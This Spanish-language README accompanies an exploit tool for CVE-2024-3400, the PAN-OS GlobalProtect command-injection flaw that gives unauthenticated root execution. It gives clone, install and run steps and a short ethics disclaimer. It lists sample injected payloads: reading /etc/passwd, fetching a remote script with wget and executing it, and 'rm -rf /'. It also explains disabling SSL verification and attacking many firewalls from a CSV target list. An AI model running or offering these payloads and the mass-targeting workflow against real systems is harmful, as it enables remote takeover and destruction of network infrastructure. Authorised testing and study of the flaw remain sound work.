
Este script está diseñado para demostrar la explotación de vulnerabilidades en firewalls PAN-OS. Envía un payload especialmente diseñado al endpoint de la API del firewall para ejecutar comandos arbitrarios. Este exploit apunta específicamente a CVE-2024-3400, una vulnerabilidad de inyección de comandos en la función GlobalProtect del software PAN-OS de Palo Alto Networks para versiones específicas de PAN-OS. Configuraciones de características específicas pueden permitir que un atacante no autenticado ejecute código arbitrario con privilegios de root en el firewall.
Nota: Asegúrate de utilizar este script únicamente con fines legales y éticos, y solo en máquinas en las que tengas permiso para realizar pruebas.
Para usar este proyecto, sigue estos pasos:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
Sigue las indicaciones para ingresar la dirección IP del firewall PAN-OS vulnerable y el payload a ejecutar.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
El script solicitará la ruta del archivo del certificado SSL del servidor del firewall PAN-OS. Si no se proporciona ninguna ruta, el script establecerá automáticamente la verificación SSL en falso, deshabilitando efectivamente SSL.
Este script te permite explotar múltiples objetivos de firewalls PAN-OS vulnerables usando un archivo CSV. A continuación se presentan las instrucciones para formatear correctamente el archivo CSV:
El archivo CSV debe tener tres columnas:
ipaddress: La dirección IP del firewall PAN-OS vulnerable. payload: El payload a ejecutar en el firewall. path/to/root_CA_certificate.pem: La ruta al certificado raíz de la CA (déjalo en blanco si la verificación del certificado está deshabilitada).
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
Crea un archivo CSV con el formato especificado. Completa las direcciones IP, los payloads y las rutas de los certificados raíz de la CA (si corresponde). Asegúrate de proporcionar rutas válidas a los certificados raíz de la CA o deja el campo en blanco si la verificación del certificado está deshabilitada. Ejecuta el script y elige la opción de usar el archivo CSV cuando se te solicite.